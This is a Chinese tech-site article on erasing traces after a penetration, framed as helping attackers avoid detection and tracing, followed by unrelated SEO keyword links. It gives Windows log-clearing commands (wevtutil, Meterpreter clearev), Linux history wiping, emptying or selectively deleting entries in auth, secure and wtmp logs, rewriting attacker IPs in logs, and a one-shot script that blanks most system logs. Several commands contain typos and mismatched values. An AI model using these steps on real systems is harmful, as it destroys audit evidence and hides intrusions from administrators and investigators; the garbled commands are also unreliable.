后渗透阶段清理痕迹的方法步骤
发表于:2024-11-13 作者:千家信息网编辑
千家信息网最后更新 2024年11月13日,这篇文章主要介绍"后渗透阶段清理痕迹的方法步骤",在日常操作中,相信很多人在后渗透阶段清理痕迹的方法步骤问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答"后渗透阶段清理痕迹
千家信息网最后更新 2024年11月13日后渗透阶段清理痕迹的方法步骤
这篇文章主要介绍"后渗透阶段清理痕迹的方法步骤",在日常操作中,相信很多人在后渗透阶段清理痕迹的方法步骤问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答"后渗透阶段清理痕迹的方法步骤"的疑惑有所帮助!接下来,请跟着小编一起来学习吧!
一、前言
在渗透完成之后,为了减少被发现和追溯的概率,攻击者有必要清除自己的攻击痕迹,本文分别对windows和linux上清理痕迹的方式做一个总结。
二、windows
有远程桌面权限时手动删除日志:
开始-程序-管理工具-计算机管理-系统工具-事件查看器-清除日志
wevtutil:
wevtutil el 列出系统中所有日志名称wevtutil cl system 清理系统日志wevtutil cl application 清理应用程序日志wevtutil cl security 清理安全日志
meterperter自带清除日志功能:
clearev 清除windows中的应用程序日志、系统日志、安全日志
清除recent:
在文件资源管理器中点击"查看"->"选项"->在常规->隐私中点击"清除"按钮或直接打开C:\Users\Administrator\Recent并删除所有内容或在命令行中输入del /f /s /q "%userprofile%\Recent*.*
三、linux
清除命令历史记录
histroy -r #删除当前会话历史记录history -c #删除内存中的所有命令历史rm .bash_history #删除历史文件中的内容HISTZISE=0 #通过设置历史命令条数来清除所有历史记录在隐蔽的位置执行命令使用vim打开文件执行命令:set history=0:!command
linux日志文件
/var/run/utmp 记录现在登入的用户/var/log/wtmp 记录用户所有的登入和登出/var/log/lastlog 记录每一个用户最后登入时间/var/log/btmp 记录错误的登入尝试/var/log/auth.log 需要身份确认的操作/var/log/secure 记录安全相关的日志信息/var/log/maillog 记录邮件相关的日志信息/var/log/message 记录系统启动后的信息和错误日志/var/log/cron 记录定时任务相关的日志信息/var/log/spooler 记录UUCP和news设备相关的日志信息/var/log/boot.log 记录守护进程启动和停止相关的日志消息
完全删除日志文件:
cat /dev/null > filename: > filename> filenameecho "" > filenameecho > filename
针对性删除日志文件:
删除当天日志sed -i '/当天日期/'d filename
篡改日志文件:
将所有172.16.13.1 ,ip替换为127.0.0.1sed -i 's/170.170.64.17/127.0.0.1/g'
一键清除脚本:
#!/usr/bin/bashecho > /var/log/syslogecho > /var/log/messagesecho > /var/log/httpd/access_logecho > /var/log/httpd/error_logecho > /var/log/xferlogecho > /var/log/secureecho > /var/log/auth.logecho > /var/log/user.logecho > /var/log/wtmpecho > /var/log/lastlogecho > /var/log/btmpecho > /var/run/utmprm ~/./bash_historyhistory -c
到此,关于"后渗透阶段清理痕迹的方法步骤"的学习就结束了,希望能够解决大家的疑惑。理论与实践的搭配能更好的帮助大家学习,快去试试吧!若想继续学习更多相关知识,请继续关注网站,小编会继续努力为大家带来更多实用的文章!
日志
文件
痕迹
历史
命令
方法
信息
系统
步骤
阶段
学习
安全
用户
程序
管理
内容
工具
应用程序
更多
错误
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
塔科夫服务器视频大全
两个人专用的聊天软件开发
大学生网络安全大赛答案
浦东新区散射网络技术费用
绥化苹果软件开发
doctor软件开发
数据库删除表中的一条记录
e100服务器
android服务器推送
批量制作表格和数据库
图片数据库mysql
iphone软件开发实例
崇明区直销软件开发费用
jsp图片数据库
csgo绑定服务器怎么办
网络安全是一门什么学科
usda数据库怎么用
网络技术大赛理论题题库
机战数据库修改
电脑如何切换数据库
关于网络安全的事例视频
潜渊症联机服务器
服务器nat的安全性
创建数据库应用系统的基本对象
关于大数据与计算机网络安全
东华软件宁波造服务器
移动网络技术对我的影响
重庆嵌入式软件开发哪家便宜
后台服务器打不开怎么办
软件开发的工作总结